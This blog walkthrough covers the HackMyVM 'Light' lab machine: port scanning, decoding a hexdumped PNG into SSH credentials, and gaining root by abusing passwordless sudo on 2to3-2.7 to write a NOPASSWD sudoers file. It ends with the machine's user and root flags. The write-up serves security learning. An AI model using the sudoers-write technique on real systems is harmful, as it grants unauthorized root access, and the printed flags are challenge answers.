0xBEN
/
Sign up to 0xBEN!
Already have an account? Sign in

HackMyVM | Light

In this walkthrough, I demonstrate how I obtained complete ownership of Light from HackMyVM
0xBEN
5 min read
HackMyVM | Light
https://downloads.hackmyvm.eu/light.zip
In: HackMyVM, Attack, CTF, Home Lab, Linux, Medium Challenge
ℹ️
I keep all of my distrusted hosts from platforms like HackMyVM on a segmented VLAN -- 10.9.9.0/24 -- that has no internet access

Nmap Results

# Nmap 7.95 scan initiated Fri Nov 21 17:01:20 2025 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.9.9.17
Nmap scan report for 10.9.9.17
Host is up (0.00041s latency).
Not shown: 65533 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 93:a4:92:55:72:2b:9b:4a:52:66:5c:af:a9:83:3c:fd (RSA)
|   256 1e:a7:44:0b:2c:1b:0d:77:83:df:1d:9f:0e:30:08:4d (ECDSA)
|_  256 d0:fa:9d:76:77:42:6f:91:d3:bd:b5:44:72:a7:c9:71 (ED25519)
25850/tcp open  unknown
| fingerprint-strings: 
|   GenericLines, NULL: 
|     00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452 .PNG........IHDR
|     00000010: 0000 013f 0000 0085 0806 0000 002d 80ff ...?.........-..
|     00000020: 0c00 0000 0173 5247 4200 aece 1ce9 0000 .....sRGB.......
|     00000030: 0004 6741 4d41 0000 b18f 0bfc 6105 0000 ..gAMA......a...
|     00000040: 0009 7048 5973 0000 0ec3 0000 0ec3 01c7 ..pHYs..........
|     00000050: 6fa8 6400 0007 de49 4441 5478 5eed dbf7 o.d....IDATx^...
|     00000060: 9314 4518 c671 ffff 1f2d ab2c 73c0 9cb0 ..E..q...-.,s...
|     00000070: 0c08 7292 0491 2092 8380 08e2 09ca c1a1 ..r... .........
|     00000080: 2248 7aed c799 2ea7 a67a 6f7b c3ed edf2 "Hz......zo{....
|     00000090: 7c3f 5553 1c7d bdd3 d361 9f09 bbf7 5400 |?US.}...a....T.
|     000000a0: 8021 c20f 8025 c20f 8025 c20f 8025 c20f .!...%...%...%..
|     000000b0: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
|     000000c0: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
|_    000000d0: 8025 c

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov 21 17:01:27 2025 -- 1 IP address (1 host up) scanned in 6.71 seconds





Service Enumeration

TCP/HIGH_PORT

ℹ️
I noticed that this port would rotate every few seconds, so you'll need to continuously port scan while you enumerate.
sudo nmap -Pn -p- -T4 10.9.9.17 | 
grep 'open' | grep -v 22 | cut -d '/' -f 1 | 
xargs -I {} nc -nv 10.9.9.17 {}
One-liner to automate the high-port discovery and connection
💡
This looks suspiciously like hexdump -C output and the .PNG magic bytes seem to point to this being a hexdump of a .png file.
sudo nmap -Pn -p- -T4 10.9.9.17 | 
grep 'open' | grep -v 22 | cut -d '/' -f 1 | 
xargs -I {} nc -nv 10.9.9.17 {} |
xargs xxd -r > file.orig

Adds a pipe to xxd -r to decode from Hexdump back to the original byte stream

The original appears to be a PNG file
I'm thinking we have a SSH credential





Exploit

SSH Access

The username / password combo from the PNG file worked





Post-Exploit Enumeration

Operating Environment

OS & Kernel

Linux light 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64 GNU/Linux

PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

Current User

uid=1000(lover) gid=1000(lover) groups=1000(lover),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Matching Defaults entries for lover on light:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lover may run the following commands on light:
    (ALL : ALL) NOPASSWD: /usr/bin/2to3-2.7



Network Configurations

Network Interfaces

ens18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether bc:24:11:34:d5:6a brd ff:ff:ff:ff:ff:ff
    inet 10.9.9.17/24 brd 10.9.9.255 scope global dynamic ens18
       valid_lft 5151sec preferred_lft 5151sec
    inet6 fe80::be24:11ff:fe34:d56a/64 scope link 
       valid_lft forever preferred_lft forever





Privilege Escalation

Sudo Privileges

Password-less sudo on 2to3-2.7
Inspecting the file and some help output
💡
Looking through the -h output, I found a way to get arbitrary file write even when the source file isn't even a Python script. The -d or --doctests_only flag allowed me to put configurations in the "python" script that weren't even Python code, and the 2to3 parser didn't complain about syntax issues.
cd "$HOME"

Change back to "/home/lover"

echo -en 'lover\t\tALL=(ALL:ALL) NOPASSWD: ALL' > lover

Create a "sudoers" file that will allow us to run all commands using "sudo" without a password

sudo /usr/bin/2to3-2.7 -d -x NOFIX -n -W -o /etc/sudoers.d/ ./lover
  • -d / --doctests_only — since our file does not contain any Python doctests, nothing as actually done by 2to3
  • -x NOFIX — this is especially true because we are using this option
  • -n — don't make a backup of /home/lover/lover
  • -W — create the new file even if not changes were made
  • -o — when outputting the "fixed" file write the new file to /etc/sudoers.d (the original file name is used)
  • ./lover is the file to inspect
"/etc/sudoers.d/lover" has been created with the original content intact
We are root!



Flags

User

iloveopenedports

Root

ilovepython
Written by
0xBEN

0xBEN

View all posts
Comments
More from 0xBEN
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.